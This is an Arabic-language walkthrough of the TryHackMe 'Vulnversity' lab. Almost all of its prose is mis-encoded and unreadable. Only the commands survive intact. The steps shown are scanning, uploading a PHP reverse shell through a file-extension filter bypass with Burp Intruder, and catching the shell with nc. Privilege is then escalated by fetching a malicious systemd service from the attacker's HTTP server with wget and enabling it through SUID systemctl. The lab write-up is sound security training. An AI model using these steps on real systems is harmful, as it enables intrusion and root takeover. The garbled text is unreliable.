TryHackMe|Vulnversity WriteUp\Walkthrough (Arabic)
ุจุณู ุงููู
ุงููู ูุจุบู ูุดูู ุงูุญู ู ุดุฑูุญ ููุฏูู ูุฑุฌุน ููููุฏูู ุนูู ููุงุชู ุจุงูููุชููุจ ุนูู ูุฐุง ุงูุฑุงุจุท:
===============================================================
ููู
ุฉ IP ูู ูู ุงูููู
ุงูุฏุฒ ุงููู ุฃูุชุจูุง ุชُุณุชุจุฏู ุจุงููIP ููู
ุดูู ุญูุชูู
ุนูู TryHackMe
ุฃูู ุญุงุฌุฉ ูุดุบู ุงููmachine ููุชุฃูุฏ ุฅููุง ุงุชุตููุง ุจุดุจูุฉ TryHackMe ูุงูุงุชุตุงู ู
ุถุจูุท، ุจุนุฏูู ูุจุฏุฃ ุจุฃูู ุฎุทูุฉ ููุญู ููู ุฅููุง ูุณูู scan ููุดุจูุฉ ุจุงุณุชุฎุฏุงู
nmap
sudo nmap IP -vv
ุทูุน ู ุนุงูุง 6 ุจุฑูุชุงุช ุงููู ูู 21،22، 139، 445، 3128،3333 ูุฑุฌุน ูุณูู Aggressive ุณูุงู ุนูู ููุณ ูุฐู ุงูุจูุฑุชุงุช
sudo nmap IP -vv -A -p 21,22,139,445,3128,3333
ุทูุน ู ุนุงูุง ู ุนููู ุงุช ูุซูุฑุฉ ููุฏุฑ ู ู ุฎูุงููุง ูุฌุงูุจ ุนูู ุฃูู ุงูุฃุณุฆูุฉ ุจุงูุชุญุฏู، ุฌู ูุน ุงูุฅุฌุงุจุงุช ุชูููููุง ุฃุณูู ุงูุตูุญุฉ ููุงูุฉ ุงูุญู.
ุงูุจุฑููุณู ุดุบุงู ุนูู ุจูุฑุช 3128 ูุฑูู ุงููุณุฎุฉ ูู 3.5.12.
ูุธุงู ุงูุชุดุบูู ูู Ubuntu ูุนุฑููุง ูุฐุง ู ู ุฎูุงู ูุฑุงุกุชูุง ูููversion ุนูู ุจูุฑุช 22.
ุงูููุจ ุณูุฑููุฑ ูุชุดุบู ุนูู ุจูุฑุช 3333.
ุจูุจุฏุฃ ุจุจูุฑุช 3333 ุจู ุง ุฅู ุฒู ู ู ูุงุถุญ ู ู ูุชุงุฆุฌ ุงูุณูุงู ู ูุฌูุฏ ุนูููุง Apache Server، ูุซุบุฑุงุช ุงูููุจ ุนุฏูุฏุฉ ูููู ู ููุง ุงูุณูู، ูุจูุฏุฎู ููุดูู ุงูุตูุญุฉ.
ุนูู ุงูู ุชุตูุญ ุทูุน ู ุนุงูุง ู ููุน ุฌุงู ุนู ุนุงุฏู ุฌุฏุง ู ุง ููู ุดูุก ู ู ูุฒ، ููู ุฌุฑุจุชูุง ุชุถุบุทูู ุนูู ุงูุตูุญุงุช ุงูู ุฎุชููุฉ ูุงูุฑูุงุจุท ู ุง ุจุชุทูุนูู ุจุดูุก، ูุฐูู ุจูุณูู directory enumeration ุจุงุณุชุฎุฏุงู gobuster
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP:3333/ -t 64
ุทูุน ู ุนุงูุง ู ุณุงุฑุงุช ู ุชุนุฏุฏุฉ، ุงูู ُููุช ูู internal، ูุฑูุญ ููู ุชุตูุญ ููุฏุฎู ุนูู ุตูุญุฉ internal
ุจููุงูู ูู ุงูุตูุญุฉ ูู ูุฐุฌ ูุฑูุน ุงูู ููุงุช، ูุฐุง ุดูุก ุฑุงุงุงุงุฆุน، ูุนูุทูู ุจูุงุฎุฐ web shell ููุฑูุนูุง ุนูู ุงูู ููุน، ุฃูุง ุงุณุชุฎุฏู ุช ุงููpentestmonkey php shell ุฃุฎุฐุชูุง ู ู ุงูู ููุน revshells ููู ู ููุน ู ู ุชุงุฒ ููุฎููู ุชุญุตู ุนูู shell ุจุณูููุฉ ููุฌู ุน ุงูุฃููุงุน ุจู ูุงู ูุงุญุฏ.
ูุฑุฌุน ุนูู ูุธุงู ูุง ููุญูุธ ุงููShell ูู ู ูู ููุณู ูู shell.php، ุจุนุฏูู ูุฑูุญ ุนูู internal ููุฑูุน ุงููshell.
ููุง ูุงุฌูุชูุง ู ุดููุฉ، ููู ุฅูู ุงููextension ู ُููุชَุฑ، ูู ุนูุงุชู ู ุง ุฃูุฏุฑ ุฃุฑูุน ู ููุงุช php ุนูู ุงููุธุงู ، ููู ููู ุญู، ููู ุฅูู ู ู ุดุฑุท ุฃุณุชุฎุฏู php ุจุนูููุง، ูู extensions ุชููุน ุบูุฑูุง ู ุซู php4، php3، phtml. ู ู ูู ุฅููุง ูุฌุฑุจ ุฌู ูุน ูุฐู ุงูุงู ุชุฏุงุฏุงุช ุนู ุทุฑูู ุฅููุง ูู ู ุฑุฉ ูุญูุธ ุงูู ูู ุจุงู ุชุฏุงุฏ ู ุฎุชูู، ุซู ูุฑุฌุน ููุตูุญุฉ ููุฑูุน ุงูู ูู ููุดูู ูููุจู ุฃู ูุง، ููู ูู ุทุฑููุฉ ุฃุณุฑุน ุจุงุณุชุฎุฏุงู burpsuite.
ุฃูู ุดูุก ุจูุญูุธ ุงูุงู ุชุฏุงุฏุงุช ุงูู4 ุงููู ูุชุจูุงูุง ููู ูู ู ูู، ูู ุงู ุชุฏุงุฏ ูู ุณุทุฑ ููุญุฏู، ูุดู ููุง php ู ุน ุฅูู ูุนุฑู ู ุง ุจููุฌุญ ูุขู ุจูุฎููู ููู ูุงุฑูุฉ، ููุณู ู ูุฐุง ุงูู ูู ู ุซูุง phpext، ุซู ู ู foxy proxy ุนูู ุงูู ุชุตูุญ ูุฎุชุงุฑ burpsuite ุซู ููุชุญ burpsuite، ุจุนุฏ ูุฐุง ูุฑุฌุน ูุฑูุน ุงููphp shell ู ู ุงูุตูุญุฉ ูููุชูุท ุงูุทูุจ، ูู ุฑุญ ูุฑูุถูุง، ูู ู ู ูู ، ุงูู ูู ุงูุขู ุฅููุง ููุชูุท ุงูุทูุจ ุนูู burp. ุจูููู ุงูุทูุจ ุชุญุช ูุงุฆู ุฉ proxy ุซู HTTP history ูุจููุงูู ุงูุทูุจ، ูุถุบุท ุจุฒุฑ ุงููุฃุฑุฉ ุงูุฃูู ู ููุฎุชุงุฑ send to intruder.
ูุฑูุญ ููintruder ุซู ูุถุบุท ุนูู § clear ุจุนุฏ ูุฐุง ูุญุฏุฏ ุนูู ุงู ุชุฏุงุฏ ุงูู ูู ููุท ููุถุบุท § add
ูุฐุง ูุจู ู ุง ูุถุบุท add
ูููุง ุจุนุฏ
ุจุนุฏ ูุฐุง ูุฑูุญ ุนูู ุงููุงุฆู ุฉ ุงููุฑุนูุฉ ุงููู ุงุณู ูุง payloads ูุชุญุช payload settings ูุถุบุท ุนูู load ุซู ุจููุชุญ ู ุนุงูุง ูุงูุฐุฉ ููู ูุงุช ุนูู ุงูุฌูุงุฒ، ูุฑูุญ ููู ูู phpext ุงููู ุฌูุฒูุงู ุจุงูุฃุนูู ููุฎุชุงุฑู. ุซู ุจุชุชุญู ู ู ุนุงูุง ุงูุงู ุชุฏุงุฏุงุช.
ูุดูู ุงูุตุญ ู ู ุนูุฏ payload encoding ุซู ูุถุบุท ุนูู Start attack ูู ุฃุนูู ุงููู ูู. ุจูุจุฏุฃ ูุฑุณู ุทูุจ ุนูู ูู ู ู ูุฐู ุงูุงู ุชุฏุงุฏุงุช. ู ู ุงููุชุงุฆุฌ ูุงุถุญ ุฅู ูููุง ููุณ ุงูุญุฌู ู ุง ุนุฏุง ูุงุญุฏ ู ุฎุชูู ุงููู ูู phtml، ูุฐูู ุจูุดูู ุนููู ุฃูู ุดูุก.
ุฅุฐุง ุดููุง ุงููhttp response ุจูุดูู ููู ุฉ success ููุฐุง ูุนูู ุฅูู ููุจู ูุฐุง ุงูุงู ุชุฏุงุฏ.
ุงููู ุจูุณููู ุงูุขู ุฅููุง ุจูุฑูุญ ููู ูู ููุบูุฑ ุงู ุชุฏุงุฏู
mv shell.php shell.phtml
ูู ูู ุดูุก ู ู ูุงุถุญ ู ู ูู ุชุฑุฌุนูู ูู ูุทุน ุงูุดุฑุญ ูุชุดูููู ููู ุชุณุชุฎุฏู ูู burpsuite ุจุงูุชูุตูู ูู ุงูู ูุทุน ุฃุนูุงู ู ู ุงูุฏูููุฉ 7:18 ุฅูู ุฅูู 10:50
ุฑูุนูุง ุงูู ูู shell.phtml ูุงุฑุชูุน ูุถุจุท ู ุนุงู، ููู ุงูู ุดููุฉ ุฅูู ู ุง ุฃุนุฑู ููู ุฑุงุญ ุงูู ูู، ุงููู ุฃุนุฑูู ููุท ุฅู ุงูุทูุจ ูุชู ุฅุฑุณุงูู ููุตูุญุฉ internal، ูุฐูู ุจูุฑุฌุน ูุณูู gobuster ููุดูู ูุด ููู ู ุณุงุฑุงุช ุชุญุช internal ู ู ูู ููุงูู ุงูู ูู ุงููู ุฑูุนูุงู ูููุง.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP:3333/internal -t 64
ุทูุน ู ุนุงูุง ุงูู ุณุงุฑuploads ูุนูู ุงุญุชู ุงู %99.99 ุจููุงูู ุงููshell ููุงู، ูุฑูุญ ููุตูุญุฉ ุนูู ุงูู ุชุตูุญ ููุจู ู ุง ูุถุบุท ุนูู ุงูุดูู ูุชุฃูุฏ ุฅู ุงููListener ุดุบุงู ุนูู ุฌูุงุฒูุง
nc -nlvp 4444
ุซู ูุถุบุท ุนูู ุงููshell ูุจููุตู ููุง ุงุชุตุงู ู ู ุงูุถุญูุฉ ุนูู ุฌูุงุฒูุง، ูุจู ุง ุฅู ุงููvictim ุฌูุงุฒ ููุงุชู linux ูุฌุฏุง ุณูู ุฅููุง ูุณูู stabilization ูููshell، ุงูุด ูุนูู؟ ูุนูู ูุฎูููุง ู ุชููุฉ ูู ุง ุชููู ุฃูู ู ุง ูุถุบุท ctrl+c ูููุฏุฑ ูุณุชุฎุฏู ุงูุฃุณูู ู tab completion ููุฐุง.
ุงูุฎุทูุงุช ูุงูุชุงูู:
ูุดุบู ูุฐู ุงูููู ุงูุฏ ุจุงุณุชุฎุฏุงู python3 ุฅุฐุง ู ุง ุถุจุท ุนุงุฏู ูุฌุฑุจ python
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
ุจุนุฏูู ูุฐู ุงูููู ุงูุฏ
export TERM=xterm
ุซู ูุถุบุท ุนูู ุงูููุจูุฑุฏ ctrl+z ุนุดุงู ูุฎูู ุงููshell ุชุฑุฌุน ููุฎูููุฉ
ุงูุญูู ูุฌูุจูุง ููุฏุงู ุจุงุณุชุฎุฏุงู ูุฐู ุงูููู ุงูุฏ
stty raw -echo;fg
ุงูุญูู ุตุงุฑ ู ุนุงูุง stable shell ููุฏุฑ ูุณุชุฎุฏู ูุง ุจุฑุงุญุชูุง ุจุฏูู ู ุง ูุฎุงู ุฅููุง ุชุทูุฑ ุฃู ุชุทูุดูุง ุฅุฐุง ุฌููุง ูู ุณุญ ููุนุฏู ุจุงูููู ุงุช. ุฅุฐุง ุฑุฌุนุช ููู ุงููshell ู ุงูู ู ูุชุธู ุฉ ูุจุงุฏูุฉ ู ู ูุต ุงูุณุทุฑ، ุจุณ ุดุบูู ุฃู ููู ุงูุฏ ู ุซู id ูุจุชุฑุฌุน ุชุถุจุท ุจุฅุฐู ุงููู.
ุงูุขู ุจู ุง ุฅููุง ุฏุงุฎู ุฌูุงุฒ ุงูุถุญูุฉ، ุจูุฑูุญ ูููhome ููุดูู ูุด ุนูุฏู ู ุณุชุฎุฏู ูู
cd home
ls
ุนูุฏู bill
cd bill
ls
ุจููุงูู ุฃูู ููุงู، ูุณุชุนุฑุถู
cat user.txt
ูุจูุฐุง ุญุตููุง ุนูู ุฃูู ููุงู ✨، ุซุงูู ููุงู ูููู ุบุงูุจุง ูู root home directory ูุนุดุงู ููุฏุฑ ููุฑุฃู ูููุตู ูู ูุญุชุงุฌ ูุฑูุน ุตูุงุญูุงุชูุง، ููู ุฃุนุทุงูู ุชูู ูุญุฉ ูู ุงูุณุคุงู ููุงู ุฅููุง ุจูุณุชุฎุฏู SUID binary، ููุจุญุซ ุนููุง ูู ุงููุธุงู ุจุงุณุชุฎุฏุงู
find / -perm /4000 2>/dev/null
ุทูุน ู ุนุงูุง binaries ูุซูุฑุฉ، ุงูู ُููุช ูููุง ูู systemctl، ุนุดุงู ูุจุญุซ ุนู ุทุฑููุฉ ูุณุชุฎุฏู ูููุง ูุฐุง ุงูุจุงููุงุฑู ูุฑูุน ุงูุตูุงุญูุงุช، ููุชุจ ูู ูููู
systemctl privilege escalation
ููู ุนุฏุฉ ู ุตุงุฏุฑ، ูุฐุง ุฌุฏุง ู ู ุชุงุฒ
https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
ุจูุณูู ุฒู ู ุง ูุจุบู ุจุงูุถุจุท، ุฃูู ุญุงุฌุฉ ุจููุณุฎ ุงูุณูุฑูุจุช ุฒู ู ุงูู ููุญูุธู ูู ู ูู ุนูู ูุธุงู ูุง، ููุนุฏู ุนูู ุงููIP ูุญุท ู ูุงูู ุนููุงู openVPN ูุฌูุงุฒูุง، ูุจุงูู ุงูู ุนููู ุงุช ุฒู ู ุงูู.
ุจุนุฏ ูุฐุง ูููู ูุฐุง ุงูุณูุฑูุจุช ุฅูู ุงูุถุญูุฉ. ุฃูู ุดูุก ูุดุบู ุจุงูุซูู ุณูุฑููุฑ ุนูู ุงูู ุฌูุฏ ุงููู ูุญุชูู ุนูู ุงูู ูู ุงููู ูุจู ููููู
python3 -m http.server
ูุนูู ุฌูุงุฒ ุงูุถุญูุฉ ูุฑูุญ ูููtmp ููุญู ู ุงูู ูู ููุงู
ุทูุจ ููู ุงุฎุชุฑุช ุงููtmp ؟؟
ุฃูู ุญุงุฌุฉ tmp ูู ู ูู ูู ุงูู ููุงุช ุงููู ููู ุชُู ุณุญ ุชููุงุฆูุง ุนูุฏ ุฅุบูุงู ุงูุฌูุงุฒ، ูู ุซูุง ูู ููุช ุชุดุชุบู ูู ุฌูุงุฒ ุงูุถุญูุฉ ููุฌุฃุฉ ุชููู، ุนูุทูู ุจููู ุณุญ ุฃู ุดูุก ุญู ูุชู ููุงู ุนูู tmp ููุตูุฑ ู ุง ูุจูู ูู ุฃุซุฑ.
ุซุงูู ุญุงุฌุฉ، ูู ุง ูุดุชุบู ุนูู ุฌูุงุฒ ุฃูุถู ุฅููุง ูุฌุนู ู ููุงุชูุง ู ุญููุธุฉ ูู ู ูุงู ูุงุญุฏ، ูุณูููุฉ ุงููุตูู ููุง ููุณูููุฉ ู ุณุญูุง ูุงูุชุฎูุต ู ููุง، ููุง ุณูุงู ูู ูุงู ูุฐุง ุงูู ูุงู ูู ู ู ููุณู ูู ุณุญ ุงููู ููู ูู ุชู ุฅุบูุงู ุงูุฌูุงุฒ ุจุดูู ู ูุงุฌุฆ.
wget http://OpenVPN-IP:8000/root.service
ูุฑูุญ ุนูู ุฌูุงุฒูุง ููุฌูุฒ ุงููlistener ููุชุฃูุฏ ุฅู ุฑูู ุงูุจูุฑุช ููุณ ุงููู ู ูุฌูุฏ ุนูู ุงููExploit ููู 9999،
ุซู ูููุฐ ุนูู ุงูุถุญูุฉ ูุฐู ุงูููู ุงูุฏุฒ
/bin/systemctl enable /dev/shm/root.service
/bin/systemctl start root
ุฅุฐุง ูู ุดูุก ุชู ุงู ุงูู ูุฑูุถ ูุฌููุง ุงุชุตุงู ุนูู ุฌูุงุฒูุง ู ู ุงูุถุญูุฉ ูููู ุงููshell ูุฐู ุงูู ุฑุฉ ุจุชููู ุจุตูุงุญูุงุช ุฑููุช. ุฃูู ู ุง ูุฌููุง ุงูุงุชุตุงู ูุฑูุญ ูู ุฌูุฏ ุฑููุช ูููุฑุฃ ุงูููุงู
cd /root
ls
cat root.txt
ูุจูุฐุง ุงูุชูููุง ู ู ุงูุญู ูุญุตููุง ุนูู ุซุงูู ููุงู ✨
ูุฐู ุฅุฌุงุจุงุช ุงูุฃุณุฆูุฉ ู ุง ุนุฏุง ุงูููุงูุงุช:
Reconnaissance
ูู ุงูุฅุฌุงุจุงุช ููุง ู ู ุฎูุงู ูุชุงุฆุฌ ุงููAggressive nmap scan ุญุตููุง ุนูููุง
Locating directories using Gobuster
Compromise the Webserver
Privilege Escalation














Comments
Post a Comment